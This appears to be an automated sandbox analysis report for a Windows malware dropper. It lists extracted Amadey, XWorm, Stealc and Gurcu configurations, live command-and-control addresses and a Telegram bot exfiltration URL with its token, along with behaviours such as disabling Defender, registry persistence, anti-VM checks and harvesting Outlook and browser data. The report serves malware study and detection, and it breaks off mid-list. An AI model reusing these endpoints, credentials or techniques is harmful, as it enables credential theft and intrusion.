Analysis
-
max time kernel
145s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 05:02
Static task
static1
Behavioral task
behavioral1
Sample
de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe
Resource
win7-20240903-en
General
-
Target
de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe
-
Size
3.1MB
-
MD5
a69aa32f8ef6d84b33b18056e03d52d7
-
SHA1
302d6aeb0e86201b7048a9f39b6aa5d476a2d38e
-
SHA256
de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca
-
SHA512
e1c1637e7be30652e3b732c7c2d8ec1135209ece72f54d6a131cb27af241c962e914acb78aaa68a5150deeaf9ed46c35b9eb9a0decce43fa03438539035c5f2c
-
SSDEEP
49152:9Ymcx4roZQ5VWaX2yYbKokN6y7Iex1hM0:95droartX2yYbFkOj0
Malware Config
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
xworm
87.120.112.33:8398
-
Install_directory
%LocalAppData%
-
install_file
svchost.exe
-
telegram
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579
Extracted
stealc
mars
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
gurcu
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023d16-2884.dat family_xworm behavioral2/memory/6132-3103-0x0000000000D10000-0x0000000000D28000-memory.dmp family_xworm -
Gurcu family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" c908739900.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" c908739900.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" c908739900.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" c908739900.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection c908739900.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" c908739900.exe -
Stealc family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ L.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ adc4548f71.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c908739900.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6b6d057204.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8e499cd4e2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 44 540 powershell.exe 45 4812 powershell.exe -
pid Process 540 powershell.exe 4812 powershell.exe 5380 powershell.exe 5668 powershell.exe 6696 powershell.exe 4008 powershell.exe 2596 powershell.exe 6016 powershell.exe 5620 powershell.exe 5380 powershell.exe -
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3192 chrome.exe 6724 chrome.exe 6428 chrome.exe 5524 chrome.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8e499cd4e2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion adc4548f71.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c908739900.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8e499cd4e2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion adc4548f71.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c908739900.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6b6d057204.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6b6d057204.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion L.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation Lumma111.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation document.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation 6b6d057204.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk document.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk document.exe -
Executes dropped EXE 23 IoCs
pid Process 956 skotes.exe 3980 Lumma111.exe 2460 7z.exe 3904 7z.exe 1592 7z.exe 1312 7z.exe 4328 L.exe 208 7z.exe 2700 Installer.exe 4092 file.exe 848 FunnyJellyfish.exe 2836 FunnyJellyfish.tmp 6132 document.exe 7164 8e499cd4e2.exe 5928 FunnyJellyfish.exe 3164 FunnyJellyfish.tmp 6060 adc4548f71.exe 2784 27329d39c4.exe 6312 c908739900.exe 1944 6b6d057204.exe 5264 skotes.exe 4568 skotes.exe 1760 service123.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine L.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine adc4548f71.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 6b6d057204.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 8e499cd4e2.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine c908739900.exe -
Loads dropped DLL 9 IoCs
pid Process 2460 7z.exe 3904 7z.exe 1592 7z.exe 1312 7z.exe 208 7z.exe 2460 regsvr32.exe 4516 regsvr32.exe 5580 regsvr32.EXE 1760 service123.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features c908739900.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" c908739900.exe -
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c908739900.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008111001\\c908739900.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8e499cd4e2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008108001\\8e499cd4e2.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adc4548f71.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008109001\\adc4548f71.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\svchost.exe" document.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\27329d39c4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008110001\\27329d39c4.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023d1f-8235.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 3656 de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe 956 skotes.exe 4328 L.exe 7164 8e499cd4e2.exe 6060 adc4548f71.exe 6312 c908739900.exe 1944 6b6d057204.exe 5264 skotes.exe 4568 skotes.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4812 set thread context of 3408 4812 powershell.exe 119 PID 2700 set thread context of 1800 2700 Installer.exe 176 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2348 1944 WerFault.exe 173 -
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language L.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8e499cd4e2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 27329d39c4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language adc4548f71.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c908739900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6b6d057204.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Lumma111.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 6b6d057204.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 6b6d057204.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3756 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 1456 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 5908 taskkill.exe 3780 taskkill.exe 5716 taskkill.exe 1372 taskkill.exe 1528 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5920 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 6132 document.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3656 de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe 3656 de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe 956 skotes.exe 956 skotes.exe 4328 L.exe 4328 L.exe 540 powershell.exe 540 powershell.exe 4812 powershell.exe 4812 powershell.exe 540 powershell.exe 4812 powershell.exe 7164 8e499cd4e2.exe 7164 8e499cd4e2.exe 5668 powershell.exe 5668 powershell.exe 3164 FunnyJellyfish.tmp 3164 FunnyJellyfish.tmp 6060 adc4548f71.exe 6060 adc4548f71.exe 5668 powershell.exe 4516 regsvr32.exe 4516 regsvr32.exe 4516 regsvr32.exe 4516 regsvr32.exe 4516 regsvr32.exe 4516 regsvr32.exe 6696 powershell.exe 6696 powershell.exe 5620 powershell.exe 5620 powershell.exe 6696 powershell.exe 5620 powershell.exe 4008 powershell.exe 4008 powershell.exe 4008 powershell.exe 2596 powershell.exe 2596 powershell.exe 2596 powershell.exe 5380 powershell.exe 5380 powershell.exe 5380 powershell.exe 4516 regsvr32.exe 4516 regsvr32.exe 4516 regsvr32.exe 4516 regsvr32.exe 4516 regsvr32.exe 4516 regsvr32.exe 4516 regsvr32.exe 6132 document.exe 6132 document.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 6312 c908739900.exe 6312 c908739900.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 4516 regsvr32.exe 6312 c908739900.exe 6312 c908739900.exe 6312 c908739900.exe 1944 6b6d057204.exe 1944 6b6d057204.exe 5264 skotes.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2460 7z.exe Token: 35 2460 7z.exe Token: SeSecurityPrivilege 2460 7z.exe Token: SeSecurityPrivilege 2460 7z.exe Token: SeRestorePrivilege 3904 7z.exe Token: 35 3904 7z.exe Token: SeSecurityPrivilege 3904 7z.exe Token: SeSecurityPrivilege 3904 7z.exe Token: SeRestorePrivilege 1592 7z.exe Token: 35 1592 7z.exe Token: SeSecurityPrivilege 1592 7z.exe Token: SeSecurityPrivilege 1592 7z.exe Token: SeRestorePrivilege 1312 7z.exe Token: 35 1312 7z.exe Token: SeSecurityPrivilege 1312 7z.exe Token: SeSecurityPrivilege 1312 7z.exe Token: SeRestorePrivilege 208 7z.exe Token: 35 208 7z.exe Token: SeSecurityPrivilege 208 7z.exe Token: SeSecurityPrivilege 208 7z.exe Token: SeDebugPrivilege 540 powershell.exe Token: SeDebugPrivilege 4812 powershell.exe Token: SeDebugPrivilege 3408 RegSvcs.exe Token: SeDebugPrivilege 6132 document.exe Token: SeDebugPrivilege 5668 powershell.exe Token: SeDebugPrivilege 5620 powershell.exe Token: SeDebugPrivilege 6696 powershell.exe Token: SeDebugPrivilege 4008 powershell.exe Token: SeIncreaseQuotaPrivilege 5620 powershell.exe Token: SeSecurityPrivilege 5620 powershell.exe Token: SeTakeOwnershipPrivilege 5620 powershell.exe Token: SeLoadDriverPrivilege 5620 powershell.exe Token: SeSystemProfilePrivilege 5620 powershell.exe Token: SeSystemtimePrivilege 5620 powershell.exe Token: SeProfSingleProcessPrivilege 5620 powershell.exe Token: SeIncBasePriorityPrivilege 5620 powershell.exe Token: 